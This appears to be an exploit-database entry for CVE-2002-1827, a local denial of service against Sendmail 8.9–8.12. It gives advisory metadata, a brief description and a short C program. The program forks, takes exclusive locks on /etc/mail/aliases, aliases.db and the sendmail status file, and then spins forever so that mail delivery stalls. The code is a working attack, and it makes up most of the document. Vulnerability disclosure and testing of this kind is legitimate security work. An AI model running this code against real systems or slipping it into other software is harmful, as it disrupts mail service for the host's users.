Sendmail 8.9.x/8.10.x/8.11.x/8.12.x - File Locking Denial of Service (2)

Author: zillion
type: dos
platform: linux
port: 
date_added: 2002-05-24 
date_updated: 2012-09-23 
verified: 1 
codes: CVE-2002-1827;OSVDB-59769 
tags: 
aliases:  
screenshot_url:  
application_url: 

// source: https://www.securityfocus.com/bid/4822/info

Sendmail is a MTA for Unix and Linux variants.

There is a vulnerability in Sendmail that will lead to a denial of service condition. The vulnerability occurs when a malicious user acquires an exclusive lock on files that Sendmail requires for operation.

#include <fcntl.h>
#include <unistd.h>

/*

Stupid piece of code to test the sendmail lock vulnerability on
FreeBSD. Run this and try sendmail -t on FreeBSD for example.

More info: http://www.sendmail.org/LockingAdvisory.txt

zillion (at safemode.org && snosoft.com)
http://www.safemode.org
http://www.snosoft.com

*/

int main() {

  if(fork() == 0) {

    char *lock1 = "/etc/mail/aliases";
    char *lock2 = "/etc/mail/aliases.db";
    char *lock3 = "/var/log/sendmail.st";

    int fd;
    fd = open(lock1,O_RDONLY);
    flock(fd,0x02);

    fd = open(lock2,O_RDONLY);
    flock(fd,0x02);

    fd = open(lock3,O_RDONLY);
    flock(fd,0x02);

    /* We are here to stay! */

    for(;;) {}

  }
}